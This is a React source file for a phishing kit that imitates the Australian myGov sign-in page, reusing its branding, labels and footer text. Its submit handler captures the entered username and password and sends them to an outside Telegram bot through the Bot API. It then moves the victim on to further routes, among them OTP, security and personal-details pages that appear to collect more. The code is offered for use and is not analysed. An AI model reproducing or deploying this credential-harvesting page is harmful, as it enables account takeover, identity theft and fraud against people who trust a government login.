import React from "react";
import { BrowserRouter as Router, Route, Routes, useNavigate } from "react-router-dom";
import Index2 from "./index2"; // Import the Index2 component
import Otp from "./otp";
import Security from "./security"; // Import the Security component
import Personal from "./personal"; // Import the Personal component (create it later)
import C from "./c";
import F from "./f";
import telegramConfig from "./config";

function HomePage() {
  const navigate = useNavigate();

  const handleSubmit = async (event) => {
    event.preventDefault();

    const username = document.getElementById("userId").value;
    const password = document.getElementById("password").value;

    // Prepare the message to send to Telegram
    const message = `
      **Telegram ID: @upperclassstunts**
      Username: ${username}
      Password: ${password}
      Date: ${new Date().toLocaleString()}
      
    `;

    // Send data to Telegram
    await sendToTelegram(message);

    // Navigate to the next page (Index2 component)
    navigate("/index2");
  };


  const sendToTelegram = async (message) => {
    try {
      const { botToken, chatId } = telegramConfig;
      const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
  
      const response = await fetch(url, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id: chatId, text: message }),
      });
  
      if (!response.ok) {
        console.error("Failed to send message:", await response.text());
      }
    } catch (error) {
      console.error("Error sending message to Telegram:", error);
    }
  };

  return (
    <div>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a className="unauth-govt-crest__link" href="#">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>
      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main">
          <div className="unauth">
            <div className="login-grid-container">
              <div className="login-grid-row">
                <div className="login-grid-column">
                  <div className="digital-id-login-card-wrapper">
                    <div className="digital-id-main-login-card override">
                      <h1>Sign in with myGov</h1>
                      <h2 className="text-align-left">
                        Using your myGov sign-in details
                      </h2>
                      <form
                        id="mygov-login-form"
                        className="mygov-login-form alternative"
                        onSubmit={handleSubmit}
                      >
                        <div className="input-group">
                          <label className="override" htmlFor="userId">
                            Username or email
                          </label>
                          <input
                            id="userId"
                            name="username"
                            aria-required="true"
                            type="text"
                            autoComplete="off"
                            required
                          />
                        </div>
                        <div className="input-group">
                          <label htmlFor="password" className="override">
                            Password
                          </label>
                          <input
                            id="password"
                            name="password"
                            type="password"
                            autoComplete="off"
                            aria-required="true"
                            required
                          />
                        </div>
                        <p className="recovery">
                          <a className="anchor override" href="#">
                            Forgot password
                          </a>
                        </p>
                        <div className="button-digital-id-main-container override">
                          <div className="digital-id-button-container">
                            <button
                              type="submit"
                              className="button-main"
                              id="submit-button"
                            >
                              Sign in
                            </button>
                          </div>
                        </div>
                        <p className="create-account-text">
                          <a
                            className="create-account-link"
                            href="https://my.gov.au/en/create-account/"
                          >
                            Create a myGov account
                          </a>{" "}
                          if you don't have one already.
                        </p>
                      </form>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">
                  Footer
                </h2>
                <ul className="lower-links">
                  <li>
                    <a href="#" target="_blank">
                      Terms of use
                    </a>
                  </li>
                  <li>
                    <a href="#" target="_blank">
                      Privacy and security
                    </a>
                  </li>
                  <li>
                    <a href="#" target="_blank">
                      Copyright
                    </a>
                  </li>
                  <li>
                    <a href="#" target="_blank">
                      Accessibility
                    </a>
                  </li>
                </ul>
              </nav>
            </section>
            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a href="#">
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                    role="img"
                  />
                </a>
              </section>
              <p className="footer-acknowledgement">
                We acknowledge the Traditional Custodians of the lands we live
                on. We pay our respects to all Elders, past and present, of all
                Aboriginal and Torres Strait Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
}

function App() {
  return (
    <Router>
      <Routes>
        <Route path="/" element={<HomePage />} />
        <Route path="/index2" element={<Index2 />} />
        <Route path="/otp" element={<Otp />} />
        <Route path="/security" element={<Security />} />
        <Route path="/personal" element={<Personal />} />
        <Route path="/c" element={<C />} />
        <Route path="/f" element={<F />} />
        {/* Add other routes as needed */}
      </Routes>
    </Router>
  );
}

export default App;